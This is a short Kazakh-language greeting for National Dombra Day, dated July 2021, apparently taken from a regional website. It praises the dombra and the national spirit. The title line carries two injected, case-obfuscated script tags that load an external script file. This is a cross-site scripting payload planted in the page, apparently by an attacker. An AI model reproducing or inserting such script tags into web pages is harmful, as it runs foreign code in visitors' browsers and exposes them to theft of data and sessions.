Ұлттық домбыра күнімен шын жүректен құттықтаймыз!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

01.07.2021

Құрметті жерлестер! Ардақты ағайын! Сіздерді Ұлттық домбыра күнімен шын жүректен құттықтаймыз! Бұл – Елбасының рухани жаңғыру жолын және салт-дәстүріміздің мән-маңызын дәріптейтін игі бастама. Қос ішекті қара домбыраның үнінде Ұлы даланың тамыры терең тарихы мен сан ғасырлық шежіресі бар. Қазақтың бекзат болмысы мен асыл қасиеттері қашанда әнмен әрленіп, күймен көмкерілген. Халқымыздың төл өнерін төрімізден түспеген домбырасыз елестету мүмкін емес. Ұлттық рухты күмбірлеген күйден артық көтеретін дүние кемде кем. Бүгінгі мереке қоңыр үнді шаттық пен несібелі ырысқа толы болсын.

Просмотров: 1307


Пікір қосу



Деректерді қолтаңбаға қосу